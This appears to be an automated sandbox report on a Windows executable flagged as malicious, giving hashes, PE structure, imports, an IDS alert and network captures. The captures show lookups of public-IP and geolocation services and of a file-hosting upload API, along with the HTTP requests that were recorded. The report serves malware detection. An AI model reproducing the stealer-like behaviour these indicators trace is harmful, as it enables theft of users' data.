                                                                                                                                                                                                                                                      SSDEEP:196608:yOgFHwfI9jUC2gYBYv3vbW5+iITm1U6fi:4FMIH2gYBgDW4TOz6
                                                                                                                                                                                                                                                      MD5:12E9F3CE18351EE539646C23CC862C5C
                                                                                                                                                                                                                                                      SHA1:0B2487FE4E3FFAF79FDF1C0C0B01F6CE68346DAF
                                                                                                                                                                                                                                                      SHA-256:72FDB72DCC71697B027824211E2879F4BF8C8974E56A857F2FCA30AD7B675D6F
                                                                                                                                                                                                                                                      SHA-512:585882CBB5E8097D47B3985326A4AE9C17D2E015801652D88A5C5230FEAB1ADD48F60BD73FA9FF34B505DE742B437E53ED03B53D5011C1834C134610FF96AC59
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16912015
                                                                                                                                                                                                                                                      Entropy (8bit):7.996822378035481
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:393216:29YiZM63hucsXMCHWUj/cuIbvR/PrK8Xms96YqZVo:29YiZt3hrsXMb8Ut/TKXlVo
                                                                                                                                                                                                                                                      MD5:017603B860F67F7F65F724E519465926
                                                                                                                                                                                                                                                      SHA1:51B1924EC73969FC16E00C0E80597C07711CF866
                                                                                                                                                                                                                                                      SHA-256:1BA7BEDAAA3A81350A78CF579E625E879D6D68CEF0F7AC8C55CC419798F380E1
                                                                                                                                                                                                                                                      SHA-512:A695347BEF5BDFDCD4ADEE43909B375828D89D48F78F88D443E4E19728FF82F2BFB5487EA80FBBBD9953394985BB0FDC935DA734EB32220FB386D701F9BC3945
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):97
Entropy (8bit):4.331807756485642
Encrypted:false
SSDEEP:3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
MD5:195D02DA13D597A52F848A9B28D871F6
SHA1:D048766A802C61655B9689E953103236EACCB1C7
SHA-256:ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
SHA-512:1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
Malicious:false
Preview:..Service Version: 0.0.0.0..user Version: 0.0.0.0....No user/signature is currently loaded...

File type:PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):7.998309569463509
TrID:
• Win64 Executable GUI (202006/5) 92.65%
• Win64 Executable (generic) (12005/4) 5.51%
• Generic Win/DOS Executable (2004/3) 0.92%
• DOS Executable Generic (2002/1) 0.92%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe
File size:24'810'296 bytes
MD5:3ac5f99224a92851c80fe4178fff6002
SHA1:20eae332be7470533009e2a0f28412463acb1f06
SHA256:a21cd46fbedb13199e3675a4ee14af9914547d237342fca0c8cd8022a7888363
SHA512:273ac0822ed0aae191333df6ebfca136e7dd87a910b11343fffefd96b37f2f4d25824a1e5f7708e01bf8bd19466b9a0bab2437b21a672e2e846ad6c3e6b3dcab
SSDEEP:393216:oAZ/msYXMrZme4GaBWbBFcCdq1auXYKKJo1/uG8IQKqSgjqgeMW5+74:oAZ/mlXKZmWaYFqoBo1uG8N/jReMD4
TLSH:28473348EB9508EDC2BBD5349DC71712E6767C161731DA6B62E903262E6F2B0CC7A313
File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........B#..,p..,p..,p.:.p..,p.:.p5.,p.:.p..,p<..p..,p<.(q..,p<./q..,p<.)q..,p...p..,p...p..,p...p..,p..-p..,p2.)q..,p2.,q..,p2..p..,
Icon Hash:1515d4d4442f2d2d
Entrypoint:0x1400266b0
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x140000000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:0x6640972B [Sun May 12 10:17:15 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:2
File Version Major:5
File Version Minor:2
Subsystem Version Major:5
Subsystem Version Minor:2
Import Hash:e8a30656287fe831c9782204ed10cd68
Instruction
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      jmp 00007F724CC4E880h
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      Programming Language:
                                                                                                                                                                                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                      • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x4b1e0 | 0x34 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x4b214 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x71000 | 0xe3bc | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x6c000 | 0x2ab4 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x80000 | 0x938 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x460e0 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x46180 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x3de10 | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x3b000 | 0x4a0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x4a4ac | 0x100 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x398ce | 0x39a00 | 43edabbddfa6948cff2e968fd336a07d | False | 0.5457226138828634 | data | 6.465308419785883 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x3b000 | 0x1118c | 0x11200 | 53297ea4f69cf70feab0538ecef732e2 | False | 0.44722285583941607 | data | 5.215657068009717 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x4d000 | 0x1ef5c | 0x1a00 | 08eb45cbc6a0e70bd1c0a96a66c4a6d0 | False | 0.2765925480769231 | DOS executable (block device driver o\3050) | 3.1766622656728773 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x6c000 | 0x2ab4 | 0x2c00 | 703496d6ceba70b1fe234ccc9c454141 | False | 0.4807350852272727 | data | 5.409685184469512 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.didat | 0x6f000 | 0x308 | 0x400 | c445681068e68e0f8df59c5ea517c5e5 | False | 0.2421875 | data | 2.786346435110699 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
_RDATA | 0x70000 | 0x15c | 0x200 | b999e3f72a9a42ebb4d9b8fafa0a18e7 | False | 0.40625 | data | 3.3314534700182197 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x71000 | 0xe3bc | 0xe400 | 02cfe737f5942f05968796f88e24ed4b | False | 0.6334292763157895 | data | 6.77846206625868 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x80000 | 0x938 | 0xa00 | c057cd0b29d094da3cebf433be170d6d | False | 0.498828125 | data | 5.228587706357198 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
PNG | 0x71674 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced |  |  | 1.0027729636048528
PNG | 0x721bc | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced |  |  | 0.9363390441839495
RT_ICON | 0x73768 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors |  |  | 0.47832369942196534
RT_ICON | 0x73cd0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors |  |  | 0.5410649819494585
RT_ICON | 0x74578 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors |  |  | 0.4933368869936034
RT_ICON | 0x75420 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m |  |  | 0.5390070921985816
RT_ICON | 0x75888 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m |  |  | 0.41393058161350843
RT_ICON | 0x76930 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m |  |  | 0.3479253112033195
RT_ICON | 0x78ed8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced |  |  | 0.9809269502193401
RT_DIALOG | 0x7cc4c | 0x2ba | data |  |  | 0.5286532951289399
RT_DIALOG | 0x7cf08 | 0x13a | data |  |  | 0.6560509554140127
RT_DIALOG | 0x7d044 | 0xf2 | data |  |  | 0.71900826446281
RT_DIALOG | 0x7d138 | 0x14a | data |  |  | 0.6
RT_DIALOG | 0x7d284 | 0x314 | data |  |  | 0.47588832487309646
RT_DIALOG | 0x7d598 | 0x24a | data |  |  | 0.6279863481228669
RT_STRING | 0x7d7e4 | 0x1fc | data |  |  | 0.421259842519685
RT_STRING | 0x7d9e0 | 0x246 | data |  |  | 0.41924398625429554
RT_STRING | 0x7dc28 | 0x1a6 | data |  |  | 0.514218009478673
RT_STRING | 0x7ddd0 | 0xdc | data |  |  | 0.65
RT_STRING | 0x7deac | 0x470 | data |  |  | 0.3873239436619718
RT_STRING | 0x7e31c | 0x164 | data |  |  | 0.5056179775280899
RT_STRING | 0x7e480 | 0x110 | data |  |  | 0.5772058823529411
RT_STRING | 0x7e590 | 0x158 | data |  |  | 0.4563953488372093
RT_STRING | 0x7e6e8 | 0xe8 | data |  |  | 0.5948275862068966
RT_STRING | 0x7e7d0 | 0x1c6 | data |  |  | 0.5242290748898678
RT_STRING | 0x7e998 | 0x268 | data |  |  | 0.4837662337662338
RT_GROUP_ICON | 0x7ec00 | 0x68 | data |  |  | 0.7019230769230769
RT_MANIFEST | 0x7ec68 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators |  |  | 0.3957333333333333
DLL | Import
KERNEL32.dll | LocalFree, GetLastError, SetLastError, FormatMessageW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileTime, CloseHandle, CreateFileW, GetCurrentProcessId, CreateDirectoryW, RemoveDirectoryW, SetFileAttributesW, GetFileAttributesW, DeleteFileW, MoveFileW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetCurrentProcess, GetExitCodeProcess, WaitForSingleObject, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapReAlloc, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, SetEvent, ResetEvent, WaitForSingleObjectEx, CreateEventW, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlPcToFileHeader, RtlUnwindEx, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP
OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
gdiplus.dll | GdipCloneImage, GdipAlloc, GdipDisposeImage, GdipCreateBitmapFromStream, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-10T17:02:34.506611+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 52.149.20.212 | 443 | 192.168.2.6 | 49726 | TCP
2024-11-10T17:03:13.264966+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 52.149.20.212 | 443 | 192.168.2.6 | 49956 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.034825087 CET44349706104.26.12.205192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.046180964 CET49707443192.168.2.645.112.123.126
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.046230078 CET4434970745.112.123.126192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.046592951 CET49707443192.168.2.645.112.123.126
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.047125101 CET49707443192.168.2.645.112.123.126
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.047137976 CET4434970745.112.123.126192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.645436049 CET44349706104.26.12.205192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.647089005 CET49706443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.647133112 CET44349706104.26.12.205192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.648490906 CET44349706104.26.12.205192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.648555040 CET49706443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.651212931 CET49706443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.651411057 CET44349706104.26.12.205192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.651463032 CET49706443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.651588917 CET49706443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.660569906 CET49713443192.168.2.6159.89.102.253
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.660612106 CET44349713159.89.102.253192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.660821915 CET49713443192.168.2.6159.89.102.253
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.661395073 CET49713443192.168.2.6159.89.102.253
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.661413908 CET44349713159.89.102.253192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.882719040 CET4434970745.112.123.126192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.887984991 CET49707443192.168.2.645.112.123.126
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.888008118 CET4434970745.112.123.126192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.889322042 CET4434970745.112.123.126192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.889393091 CET49707443192.168.2.645.112.123.126
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.895075083 CET49707443192.168.2.645.112.123.126
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.895216942 CET49707443192.168.2.645.112.123.126
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.896755934 CET49714443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.896785975 CET44349714104.26.12.205192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.896858931 CET49714443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.898658037 CET49714443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:28.898669004 CET44349714104.26.12.205192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:29.503468037 CET44349714104.26.12.205192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:29.503968000 CET49714443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:29.503977060 CET44349714104.26.12.205192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:29.505019903 CET44349714104.26.12.205192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:29.505075932 CET49714443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:29.506382942 CET49714443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:29.506527901 CET49714443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:29.507611036 CET49719443192.168.2.6159.89.102.253
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:29.507644892 CET44349719159.89.102.253192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:29.507709026 CET49719443192.168.2.6159.89.102.253
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:29.508034945 CET49719443192.168.2.6159.89.102.253
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:29.508045912 CET44349719159.89.102.253192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:29.788520098 CET44349713159.89.102.253192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:29.788954020 CET49713443192.168.2.6159.89.102.253
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:29.788980007 CET44349713159.89.102.253192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:29.790083885 CET44349713159.89.102.253192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:29.790148020 CET49713443192.168.2.6159.89.102.253
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:29.791591883 CET49713443192.168.2.6159.89.102.253
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:29.791591883 CET49713443192.168.2.6159.89.102.253
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:30.595789909 CET44349719159.89.102.253192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:30.596311092 CET49719443192.168.2.6159.89.102.253
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:30.596327066 CET44349719159.89.102.253192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:30.597358942 CET44349719159.89.102.253192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:30.597522974 CET49719443192.168.2.6159.89.102.253
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:30.598717928 CET49719443192.168.2.6159.89.102.253
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:30.598886013 CET44349719159.89.102.253192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:30.598937035 CET49719443192.168.2.6159.89.102.253
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:30.599013090 CET49719443192.168.2.6159.89.102.253
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:42.996911049 CET4979480192.168.2.634.160.111.145
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:43.001961946 CET804979434.160.111.145192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:43.002042055 CET4979480192.168.2.634.160.111.145
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:43.002326012 CET4979480192.168.2.634.160.111.145
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:43.008110046 CET804979434.160.111.145192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:43.607237101 CET804979434.160.111.145192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:43.607558012 CET4979480192.168.2.634.160.111.145
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:43.612862110 CET804979434.160.111.145192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:43.612915993 CET4979480192.168.2.634.160.111.145
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:46.521658897 CET49811443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:46.521676064 CET44349811104.26.12.205192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:46.521735907 CET49811443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:46.526444912 CET49811443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:46.526453972 CET44349811104.26.12.205192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:46.555805922 CET49812443192.168.2.645.112.123.126
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:46.555841923 CET4434981245.112.123.126192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:46.555922985 CET49812443192.168.2.645.112.123.126
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:46.556348085 CET49812443192.168.2.645.112.123.126
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:46.556360960 CET4434981245.112.123.126192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:47.138223886 CET44349811104.26.12.205192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:47.138859987 CET49811443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:47.138871908 CET44349811104.26.12.205192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:47.139734030 CET44349811104.26.12.205192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:47.139796972 CET49811443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:47.141269922 CET49811443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:47.141369104 CET44349811104.26.12.205192.168.2.6
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:47.141424894 CET49811443192.168.2.6104.26.12.205
                                                                                                                                                                                                                                                      Nov 10, 2024 17:02:47.141468048 CET49811443192.168.2.6104.26.12.205
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
| --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Nov 10, 2024 17:02:20.044852018 CET | 192.168.2.6 | 1.1.1.1 | 0x890b | Standard query (0) | blank-v1rwt.in | A (IP address) | IN (0x0001) | false |
| Nov 10, 2024 17:02:21.277750015 CET | 192.168.2.6 | 1.1.1.1 | 0x2679 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false |
| Nov 10, 2024 17:02:22.820998907 CET | 192.168.2.6 | 1.1.1.1 | 0x48f6 | Standard query (0) | ifconfig.me | A (IP address) | IN (0x0001) | false |
| Nov 10, 2024 17:02:28.021780968 CET | 192.168.2.6 | 1.1.1.1 | 0xa1a5 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false |
| Nov 10, 2024 17:02:28.036401987 CET | 192.168.2.6 | 1.1.1.1 | 0xb5df | Standard query (0) | api.gofile.io | A (IP address) | IN (0x0001) | false |
| Nov 10, 2024 17:02:28.652357101 CET | 192.168.2.6 | 1.1.1.1 | 0x5499 | Standard query (0) | geolocation-db.com | A (IP address) | IN (0x0001) | false |

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Nov 10, 2024 17:02:20.053761005 CET | 1.1.1.1 | 192.168.2.6 | 0x890b | Name error (3) | blank-v1rwt.in | none | none | A (IP address) | IN (0x0001) | false |
| Nov 10, 2024 17:02:21.285059929 CET | 1.1.1.1 | 192.168.2.6 | 0x2679 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false |
| Nov 10, 2024 17:02:22.828632116 CET | 1.1.1.1 | 192.168.2.6 | 0x48f6 | No error (0) | ifconfig.me | | 34.160.111.145 | A (IP address) | IN (0x0001) | false |
| Nov 10, 2024 17:02:28.028923035 CET | 1.1.1.1 | 192.168.2.6 | 0xa1a5 | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false |
| Nov 10, 2024 17:02:28.028923035 CET | 1.1.1.1 | 192.168.2.6 | 0xa1a5 | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false |
| Nov 10, 2024 17:02:28.028923035 CET | 1.1.1.1 | 192.168.2.6 | 0xa1a5 | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false |
| Nov 10, 2024 17:02:28.045572042 CET | 1.1.1.1 | 192.168.2.6 | 0xb5df | No error (0) | api.gofile.io | | 45.112.123.126 | A (IP address) | IN (0x0001) | false |
| Nov 10, 2024 17:02:28.659907103 CET | 1.1.1.1 | 192.168.2.6 | 0x5499 | No error (0) | geolocation-db.com | | 159.89.102.253 | A (IP address) | IN (0x0001) | false |


• ip-api.com
• ifconfig.me

| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
| --- | --- | --- | --- | --- | --- | --- |
| 0 | 192.168.2.6 | 49700 | 208.95.112.1 | 80 | 2536 | C:\Users\user\Desktop\Built.exe |

Timestamp: Nov 10, 2024 17:02:21.306849957 CET
Bytes transferred: 117
Direction: OUT
Data:
GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Accept-Encoding: identity
User-Agent: python-urllib3/2.2.3

Timestamp: Nov 10, 2024 17:02:21.908087969 CET
Bytes transferred: 174
Direction: IN
Data:
HTTP/1.1 200 OK
Date: Sun, 10 Nov 2024 16:02:21 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 5
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 74 72 75 65 0a
Data Ascii: true


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
| --- | --- | --- | --- | --- | --- | --- |
| 1 | 192.168.2.6 | 49703 | 34.160.111.145 | 80 | 5388 | C:\Windows\System32\curl.exe |

Timestamp: Nov 10, 2024 17:02:22.844841003 CET
Bytes transferred: 75
Direction: OUT
Data:
GET / HTTP/1.1
Host: ifconfig.me
User-Agent: curl/7.83.1
Accept: */*

Timestamp: Nov 10, 2024 17:02:23.456208944 CET
Bytes transferred: 165
Direction: IN
Data:
HTTP/1.1 200 OK
date: Sun, 10 Nov 2024 16:02:22 GMT
content-type: text/plain
Content-Length: 14
access-control-allow-origin: *
via: 1.1 google
Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32
Data Ascii: 173.254.250.72


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
